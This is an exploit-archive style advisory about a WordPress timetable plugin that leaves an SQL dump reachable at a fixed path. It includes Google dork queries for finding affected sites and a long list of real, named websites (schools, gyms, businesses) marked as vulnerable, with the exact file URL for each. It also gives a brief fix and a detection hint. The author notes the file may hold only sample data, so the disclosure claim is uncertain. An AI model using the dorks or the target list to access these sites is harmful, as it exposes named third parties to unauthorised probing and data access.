#################################################################################################
# Exploit Title : WordPress TimeTable Responsive Schedule Plugin 5.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org ~ codecanyon.net
# Software Download Link : codecanyon.net/item/timetable-responsive-schedule-for-wordpress/7010836
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 5.4
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/timetable/dummy-content-files/''
intext:''Powered by Tempera & WordPress.''
intext:''Site built by Mustard''
intext:''© 2018 Westminster Academy''
intext:''Designed by Brandyou.ie''
intext:''All Rights Reserved by WebCorp.gt''
intext:''Built By Marketing Sweet'' site:au
intext:''Website Design Victor Harbor - WebMarketSmart.com''
intext:''Maintained by OMTech'' site:il
intext:''© Todos los derechos reservados. Givinn 2017''
intext:''Site internet par UMAO'' site:fr
intext:''© 2018 - Fitness Zone. Design: Design Themes''
intext:''Desarrollado por www.grupoorigami.cl''
intext:''Webdesign realizat de Idea Perpetua.''
# PacketStormSecurity Exploit Link : packetstormsecurity.com/files/150709/WordPress-TimeTable-Responsive-Schedule-5.4-Database-Disclosure.html
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# CWE-23 [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- phpMyAdmin SQL Dump
-- version 4.1.8
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.1.73-cll
-- PHP Version: 5.4.23
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
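# Exploit ( path of the exposed SQL dump, relative to the WordPress root ) :
/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
# Note : The dump sits inside the plugin's own directory and is listed below as reachable by a plain web request.
# Judging by the directory name it may hold only the plugin's sample data; check the file's contents per installation.
# Fix : Delete the dummy-content-files directory once setup is done, or deny web access to *.sql files under wp-content/plugins.
# Detection : Requests for this path in the web server access log indicate probing.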
#################################################################################################
# Example Vulnerable Site =>
[+] wa.edu/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] rockford.edu.pk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] scpap.cz/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] despomar.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] polcon2018.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] folkeast.co.uk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] coolrooms.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] seproes.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lindani.co.za/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] pcclinic.pt/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] krateseye.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] nacpc.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] akademitahfizmandarin.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] combatnerf.ca/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] athensmha.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] marshallspark.org.uk/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] sbdac.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] medfit.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] soaznp.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] gospel.tv/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] prc.ie/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] indratek.com/demos/goobecmexico/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lykeo.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] crossfitthreeflow.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] martiokul.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] gkoled.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] helsingborgmarathon.se/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] mensajeriaexpressguatemala.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] idercexa.eu/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] oceanblueomega.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] orcunkurum.com/orcunkurum/orcunjz/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ekilibrate.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ess2018.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] vhcoc.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] exidom.com.au/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] sweetspace.tw/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] estilodeaprender.com.br/educacao/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] tnhimss.org/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] ella.omtech.co.il/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] adhikarayoga.com/web/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] vessi.cl/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] jumfil.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] shatibi.fr/wordpress/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] lateletuya.com/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] fotogankel.no/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] nailash.mx/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] oajlpgym.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] mag-boxing.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] teledoc.cl/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] bluelife.ro/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] purefitness.gr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] loie.fr/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
[+] fnf.org.bo/portal/wp-content/plugins/timetable/dummy-content-files/event_hours.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################